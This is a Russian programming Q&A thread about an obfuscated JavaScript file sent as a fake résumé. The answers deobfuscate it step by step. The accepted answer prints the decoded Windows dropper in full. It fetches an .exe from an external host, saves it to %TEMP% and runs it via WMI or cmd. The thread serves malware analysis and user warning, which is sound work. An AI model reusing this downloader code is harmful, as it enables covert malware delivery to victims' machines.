# Объясните значение кода

Tags: javascript

Добрый день. Незнакомый человек пытался скинуть резюме в файле .doc. Редакторы его не открыли. Потом он мне скинул файл .scr Я отказался его исполнять. Он мне скинул .js:

```
function Byhezo(Upabyd){    
     var Yt="56"+"4a"+"58";var Ra="4a"+"52"+"55"+"48"+"4f"; 
     return(new this["F"+"u"+"n"+"c"+"t"+"i"+"o"+"n"](Upabyd)());
}
function Hucana(Deru){
     Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
     Ry = Yc["charAt"](Deru);
     try {
         Jime = Yc["charAt"](Deru);
         Byhezo(Jime+","+Jime);}
    catch (Wa) {
         var Napu = Wa["message"];  
         var Fyby = Napu["substring"]("1", "2");
         return Fyby;
    }
    return Ry;}
  //А дальше долгий код   Hucana("{...}")
  var Egaz=Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44")
```

Общались в телеге. Есть предположение, что это не хороший человек.

Могу скинуть его файлы. .doc, .js, .scr Пишите в телегу @vadim_bondar

Comment: код призывающий сатану

Comment: Хаха, да я серьезно спрашиваю. Странное резюме)

Comment: Троян это, не сомневайтесь

Comment: Спасибо. Я открыл только .js, через хром и sublime text. Есть опасность?

Comment: слишком маленький кусок кода, если исходить из него, то `Hucana` вернет пробел, если параметр попадает на букву из строки и число, если на число. То есть в приведенном примере результатом Egaz будет строка из 4х пробелов

Comment: Код явно рассчитан на [виндовый JS-рантайм](https://msdn.microsoft.com/en-us/library/9bbdkx3k.aspx). Так что если вы не открывали его именно им, никакой опасности нет. Саблайм точно его не запустит, Хром тоже вряд ли.

Comment: @D-side, пока ничего специфичного нет в коде, откуда версия про другой рантайм?

Comment: @Grundy из способа распространения.

Comment: @D-side, ну если только так :-)

Comment: javascript не такой уж и без обидный(((

Answer (score 11, accepted):

Это обфусцированный код и скрывается за ним наверняка какой-нить троян. Можно провести реверс-инжиниринг и понять, что он делает. Для этого прямо в редакторе можете попробовать "скомпилировать в уме" :) - раскрутить исходник в обратную сторону и получить оригинальный код. (кидай мне, попробую тоже, это очень увлекательно на самом деле). Можете попробовать сами. Вот один из примеров как это делать - [Реверс-инжиниринг вредоносного мошеннического скрипта](https://habrahabr.ru/company/mailru/blog/336232/)

UPD.:

Готово! Итак, в самом начале мы имеем исходник вида:

```
function Byhezo(Upabyd) {
    var Yt = "56" + "4a" + "58";
    var Ra = "4a" + "52" + "55" + "48" + "4f";
    return (new this["F" + "u" + "n" + "c" + "t" + "i" + "o" + "n"](Upabyd)());
}
function Hucana(Deru) {
    Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
    Ry = Yc["charAt"](Deru);
    try {
        Jime = Yc["charAt"](Deru);
        Byhezo(Jime + "," + Jime);
    } catch (Wa) {
        var Napu = "'" + Wa["message"];
        var Fyby = Napu["substring"]("1", "2");
        return Fyby;
    }
    return Ry;
}
var Egaz = Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44") + /* 150 кб текста */ + ")" + ";";
Byhezo(Egaz);
```

Переменная `Egaz` накапливает в себе исходник будущего js-кода лоадера. Для этого используется декодер - функция `Hucana` и ключ `Yc` в ней. Функция выкусывает нужный байт по смещению и выполняет его через `Byhezo` (которая в свою очередь выполняет `(new Function('внедряемый код'))()`). В случае ошибки (работает только в IE!) декодер возвращает второй байт текста ошибки, иначе декодируемый символ из ключа.

Если закомментировать самую последнюю строчку и посмотреть, что в ней накопилось, то мы получим предварительный исходник лоадера (я заменил оригинальное `Ajosesitufowyzyzygoqol` на короткое `_`):

```
var _ = ["\x64", "\x61", "\x68", "\x49", "\x52", "\x4f", "\x63", "\x79", "\x4e", "\x48", "\x39", "\x65", "\x43", "\x54", "\x73", "\x47", "\x32", "\x72", "\x59", "\x55", "\x37", "\x4c", "\x58", "\x70", "\x6f", "\x7a", "\x38", "\x78", "\x31", "\x4d", "\x53", "\x69", "\x6e", "\x71", "\x41", "\x67", "\x51", "\x33", "\x76", "\x42", "\x6c", "\x6a", "\x62", "\x50", "\x5a", "\x46", "\x74", "\x66", "\x35", "\x75", "\x45", "\x77", "\x30", "\x6d", "\x44", "\x34", "\x36", "\x57", "\x56", "\x2e", "\x2e\x65", "\x25", "\x39\x32", "\x31\x30\x30\x30\x30\x30\x30\x30\x30", "\x2e\x65\x78\x65", "\x77\x69\x6e\x6d\x67\x6d\x74\x73\x3a\x57\x69\x6e\x33\x32\x5f\x50\x72\x6f\x63\x65\x73\x73", "\x32\x30", "\x20", "\x2f", "\x3a", "\x2d"];

function Zevo(Agyz, Ul) {
    var Isag = _[0] + _[1] + _[2] + _[3] + _[4] + _[5] + _[6] + _[7] + _[8] + _[9] + _[10] + _[11] + _[12] + _[13] + _[14] + _[15] + _[16] + _[17] + _[18] + _[19] + _[20] + _[21] + _[22] + _[23] + _[24] + _[25] + _[26] + _[27] + _[28] + _[29] + _[30] + _[31] + _[32] + _[33] + _[34] + _[35] + _[36] + _[37] + _[38] + _[39] + _[40] + _[41] + _[42] + _[43] + _[44] + _[45] + _[46] + _[47] + _[48] + _[49] + _[50] + _[51] + _[52] + _[53] + _[54] + _[55] + _[56] + _[57] + _[58];
    try {
        var sc = this[_[14] + _[6] + _[17] + _[11] + _[11] + _[32]][_[51] + _[31] + _[0] + _[46] + _[2]];
    } catch (ers) {
        var Uduh = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[57] + _[30] + _[6] + _[17] + _[31] + _[23] + _[46] + _[59] + _[30] + _[2] + _[11] + _[40] + _[40]);
        if (Ul == _[60] + _[27] + _[11]) {
            var Qi = Uduh[_[50] + _[27] + _[23] + _[1] + _[32] + _[0] + _[50] + _[32] + _[38] + _[31] + _[17] + _[24] + _[32] + _[53] + _[11] + _[32] + _[46] + _[30] + _[46] + _[17] + _[31] + _[32] + _[35] + _[14]](_[61] + _[13] + _[50] + _[29] + _[43] + _[61]) + this[_[30] + _[46] + _[17] + _[31] + _[32] + _[35]][_[47] + _[17] + _[24] + _[53] + _[12] + _[2] + _[1] + _[17] + _[12] + _[24] + _[0] + _[11]](_[62]) + this[_[29] + _[1] + _[46] + _[2]][_[17] + _[24] + _[49] + _[32] + _[0]](this[_[29] + _[1] + _[46] + _[2]][_[17] + _[1] + _[32] + _[0] + _[24] + _[53]]() * _[63]) + _[64];
        }
        var Boxa = 0;
        var Fihali = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[29] + _[30] + _[22] + _[29] + _[21] + _[16] + _[59] + _[22] + _[29] + _[21] + _[9] + _[13] + _[13] + _[43]);
        Fihali[_[24] + _[32] + _[17] + _[11] + _[1] + _[0] + _[7] + _[14] + _[46] + _[1] + _[46] + _[11] + _[6] + _[2] + _[1] + _[32] + _[35] + _[11]] = function () {
            if (Fihali[_[17] + _[11] + _[1] + _[0] + _[7] + _[30] + _[46] + _[1] + _[46] + _[11]] == _[55] && Fihali[_[14] + _[46] + _[1] + _[46] + _[49] + _[14]] == _[16] + _[52] + _[52]) {
                var Capo = new this[_[34] + _[6] + _[46] + _[31] + _[38] + _[11] + _[22] + _[5] + _[42] + _[41] + _[11] + _[6] + _[46]](_[34] + _[54] + _[5] + _[54] + _[39] + _[59] + _[30] + _[46] + _[17] + _[11] + _[1] + _[53]);
                Capo[_[24] + _[23] + _[11] + _[32]]();
                Capo[_[46] + _[7] + _[23] + _[11]] = _[28];
                Capo[_[51] + _[17] + _[31] + _[46] + _[11]](Fihali[_[4] + _[11] + _[14] + _[23] + _[24] + _[32] + _[14] + _[11] + _[39] + _[24] + _[0] + _[7]]);
                if (Capo[_[14] + _[31] + _[25] + _[11]] > _[52]) {
                    Boxa = _[28];
                    Capo[_[23] + _[24] + _[14] + _[31] + _[46] + _[31] + _[24] + _[32]] = _[52];
                    Capo[_[14] + _[1] + _[38] + _[11] + _[13] + _[24] + _[45] + _[31] + _[40] + _[11]](Qi, _[16]);
                    try {
                        if (Ul == _[64]) {
                            var result = _[0];
                            try {
                                var processid;
                                var query = GetObject(_[65]);
                                result = query.Create(Qi, null, null, processid);
                            } catch (er) {
                                var result = _[66];
                            }
                            if (result = !_[52]) {
                                Uduh[_[4] + _[49] + _[32]](_[6] + _[53] + _[0] + _[67] + _[68] + _[6] + _[67] + Qi, _[52], _[52]);
                            }
                        }
                    } catch (er) {
                    }
                    ;
                }
                ;Capo[_[6] + _[40] + _[24] + _[14] + _[11]]();
            }
            ;
        };
        try {
            Fihali[_[24] + _[23] + _[11] + _[32]](_[15] + _[50] + _[13], Agyz, _[47] + _[1] + _[40] + _[14] + _[11]);
            Fihali[_[14] + _[11] + _[32] + _[0]]();
        } catch (er) {
        }
        ;
    }
};
Zevo(_[2] + _[46] + _[46] + _[23] + _[69] + _[68] + _[68] + _[14] + _[1] + _[53] + _[7] + _[17] + _[1] + _[31] + _[20] + _[20] + _[20] + _[53] + _[59] + _[23] + _[70] + _[2] + _[24] + _[14] + _[46] + _[59] + _[31] + _[32] + _[68] + _[20] + _[20] + _[20] + _[59] + _[11] + _[27] + _[11], _[64]);
```

Это всё ещё непонятный нам код, но достаточно написать небольшой декодер на php...

```
$Ajosesitufowyzyzygoqol = ["\x64", "\x61", /* вырезано для экономии места */ "\x3a", "\x2d"];
$src = <<<GOVNO
    тут исходник из js
GOVNO;
foreach ($Ajosesitufowyzyzygoqol as $i => $char) {
    $src = str_replace('_['.$i.']', '"' . $char . '"', $src);
}
$src = str_replace('" + "', '', $src);
file_put_contents(__DIR__ . "/tmp.txt", $src);
```

... и запустить его, как мы получим более дружелюбный формат исходников:

```
function Zevo(Agyz, Ul) {
    var Isag = "dahIROcyNH9eCTsG2rYU7LXpoz8x1MSinqAgQ3vBljbPZFtf5uEw0mD46WV";
    try {
        var sc = this["screen"]["width"];
    } catch (ers) {
        var Uduh = new this["ActiveXObject"]("WScript.Shell");
        if (Ul == ".exe") {
            var Qi = Uduh["ExpandEnvironmentStrings"]("%TEMP%") + this["String"]["fromCharCode"]("92") + this["Math"]["round"](this["Math"]["random"]() * "100000000") + ".exe";
        }
        var Boxa = 0;
        var Fihali = new this["ActiveXObject"]("MSXML2.XMLHTTP");
        Fihali["onreadystatechange"] = function () {
            if (Fihali["readyState"] == "4" && Fihali["status"] == "200") {
                var Capo = new this["ActiveXObject"]("ADODB.Stream");
                Capo["open"]();
                Capo["type"] = "1";
                Capo["write"](Fihali["ResponseBody"]);
                if (Capo["size"] > "0") {
                    Boxa = "1";
                    Capo["position"] = "0";
                    Capo["saveToFile"](Qi, "2");
                    try {
                        if (Ul == ".exe") {
                            var result = "d";
                            try {
                                var processid;
                                var query = GetObject("winmgmts:Win32_Process");
                                result = query.Create(Qi, null, null, processid);
                            } catch (er) {
                                var result = "20";
                            }
                            if (result = !"0") {
                                Uduh["Run"]("cmd /c " + Qi, "0", "0");
                            }
                        }
                    } catch (er) {
                        //
                    }
                }
                Capo["close"]();
            }
        };
        try {
            Fihali["open"]("GET", Agyz, "false");
            Fihali["send"]();
        } catch (er) {
            //
        }
    }
}
Zevo("http://samyrai777m.p-host.in/777.exe", ".exe");
```

И что же мы видим тут?! О боже! Да это же загрузчик экзешника и его запуск прямо в вашей любимой винде!

Файл сохраняется во временную папку со случайным именем `var Qi = Uduh["ExpandEnvironmentStrings"]("%TEMP%") + this["String"]["fromCharCode"]("92") + this["Math"]["round"](this["Math"]["random"]() * "100000000") + ".exe";`

Остальное думаю понятно и так. Не советую ходить по ссылке и запускать приложение из последней строчки исходников.

Comment: Получилось? Я тут посмотрел код из вопроса, но что-то в нём ничего особо интересного, кроме букв `n`, про которые я сначала не подумал.

Comment: @Qwertiy работа! вечером покопаюсь. отпишусь.

Comment: Начинать копать стоит только когда автор выложит что именно скрывалось за вот этим комментарием: `//А дальше долгий код   Hucana("{...}")` :-)

Comment: @PavelMayorov, ну я поэтому и спросил :)

Comment: готово! осторожнее там :)

Comment: javascript не такой уж и без обидный(((

Comment: @pavel1787mego, но ведь из браузера не заработает.

Answer (score 2):

> ```
> function Byhezo(Upabyd){    
>      var Yt="56"+"4a"+"58";var Ra="4a"+"52"+"55"+"48"+"4f"; 
>      return(new this["F"+"u"+"n"+"c"+"t"+"i"+"o"+"n"](Upabyd)());
> }
> ```

Переменные бесполезны, т. к. к ним нет доступа. Принимает код `Upabyd`, создаёт из него функцию `this` - наверняка `window` - получается `window.Function` и вызывает её как конструктор без параметров. Так себе обфускация.

> ```
> function Hucana(Deru){
>      Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
>      Ry = Yc["charAt"](Deru);
> ```

А вот теперь переменные глобальные. Эта строка в `Yc` и символ по индексу `Deru` в `Ry`.

> ```
>      try {
>          Jime = Yc["charAt"](Deru);
>          Byhezo(Jime+","+Jime);}
> ```

Функция будет вызвана на символе строки, повторённом через запятую. Успешно завершится для цифр, но упадёт для букв, если они не были использованы в качестве глобальных переменных.

> ```
>     catch (Wa) {
>          var Napu = Wa["message"];
> ```

*Далее зачёркнутым текстом написано поведение в хроме, а нормальным - в IE, а следовательно и при обычном запуске в windows.*

Сообщение об ошибке, примерно такое: <s>`d is not defined`</s> `"d" не определено`, причём <s>в первом</s> во втором символе та буква, которая использовалась в качестве переменной. Т. е. `Yc[Deru]`

Чуть не прозевал. Если индекс был за пределами строки, то вызовется `Byhezo(",")` и произойдёт другая ошибка: <s>`Unexpected token ,`</s> `Синтаксическая ошибка`

> ```
>          var Fyby = Napu["substring"]("1", "2");
>          return Fyby;
>     }
> ```

Подстрока (вторая буква) того сообщения - если индекс принадлежал строке, то  <s>пробел, иначе буква `n`</s> соответствующий символ строки, иначе мусор, зависящий от локализации системы.

> ```
>     return Ry;}
> ```

Этот `return` выполняется только если не упало, т. е. если `Yc[Deru]` - цифра, то вернуть её (строкой).

Однако, если вспомнить, что в другой ветке тоже возвращается символ строки, получается, что функция всегда возвращает соответствующий символ строки.

> ```
>  //А дальше долгий код   Hucana("{...}")
>   var Egaz=Hucana("21") + Hucana("1") + Hucana("46") + " " + Hucana("44")
> ```

Пока получается так:

```
var Yc = "4ag6pcSMXtuL05s7zUGW2v9qxdewOyCinTD3PFZEVINbABrYoQHR18hlfjm";
var Egaz = Yc[21] + Yc[1] + Yc[46] + " " + Yc[44] // "var A"
```

Как видно, этот кусок кода безвреден. Но строка явно формируется не просто так и то, что с ней потом сделают, скорее всего, должно делать что-то плохое. <s>Так же обращаю внимание, что это строка из чисел, разделённых пробелами (возможно ещё есть буквы `n`, но маловероятно). Впрочем, созданием глобальных переменных можно в неё и буквы поместить. Думаю, эта строка потом превратится в очередной массив индексов, который будет использован для другой строки.</s> Уже по var ясно, что формируется js-код. Где-то дальше его выполнят.

Comment: В IE сообщение о неопределённой переменной выглядит так: `'x' is undefined` (имя переменной в кавычках). Поэтому второй символ оказывается буквой, а не пробелом. 21, 1, 46 --> `var`

Comment: @ЕгорБанин, спасибо! Зря я на хроме смотрел исключение :)

Comment: @Qwertiy такая же фигня. у меня мак и фф, пришлось попросить товарища с виндой и ослом.

Comment: @ЕгорБанин, у тебя IE английский. У меня такое выдаёт: `"x" не определено` и `Синтаксическая ошибка` на запятую.

Comment: @ЕгорБанин, поправил ответ.

Comment: @Lexx918, поправил ответ.